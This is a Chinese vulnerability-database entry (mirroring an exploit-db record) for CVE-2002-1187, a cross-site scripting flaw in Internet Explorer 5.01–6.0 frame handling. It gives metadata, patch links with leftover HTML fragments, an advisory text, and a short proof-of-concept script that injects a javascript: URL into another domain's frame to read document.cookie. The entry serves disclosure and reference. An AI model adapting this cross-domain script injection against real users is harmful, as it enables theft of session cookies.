Microsoft Internet Explorer IFrame/Frame执行跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106968 漏洞类型 跨站脚本
发布时间 2002-09-09 更新时间 2006-04-07
CVE编号 CVE-2002-1187 CNNVD-ID CNNVD-200212-023
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/21777
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-023
|漏洞详情
Internet Explorer 5.01至6.0版本存在跨站脚本(XSS)漏洞。远程攻击者可以借助web页面使用并执行或元素和java脚本读取并执行本地操作系统上的文件,也称为 "Frames Cross Site Scripting",正如使用PrivacyPolicy.dlg资源。 </p> </div> <div class="d_ldjj m_t_20"> <div class="title_bt"> <h2 style="width:100px;">漏洞公告</h2> </div> <div style="height:20px;"></div> <p style="text-indent:2em"> Microsoft has released a patch: Microsoft Internet Explorer 5.0.1 SP1 <ul><li> Microsoft q328970 <a href=" http://www.microsoft.com/windows/ie/downloads/critical/q328970/default.asp"> http://www.microsoft.com/windows/ie/downloads/critical/q328970/default .asp</a></li> </ul> Microsoft Internet Explorer 5.0.1 for Windows 98 <ul><li> Microsoft q328970 <a href=" http://www.microsoft.com/windows/ie/downloads/critical/q328970/default.asp"> http://www.microsoft.com/windows/ie/downloads/critical/q328970/default .asp</a></li> </ul> Microsoft Internet Explorer 5.0.1 SP2 <ul><li> Microsoft q328970 <a href=" http://www.microsoft.com/windows/ie/downloads/critica
|漏洞EXP
source: http://www.securityfocus.com/bid/5672/info

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the "javascript" protocol, followed by the desired code. Attackers may also execute script code within the "My Computer" Zone. This may have more severe consequences. 

<script language="jscript">
onload=function () {
    var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
        },
        7000
    );
}
</script>
|参考资料
resource:
hyperlink:http://marc.info/?l=bugtraq&m=103158601431054&w=2
resource:Patch
hyperlink:http://www.iss.net/security_center/static/10066.php
resource:Patch
hyperlink:http://www.microsoft.com/technet/security/bulletin/ms02-066.asp
resource:
hyperlink:http://www.securityfocus.com/bid/5672
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A203
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A225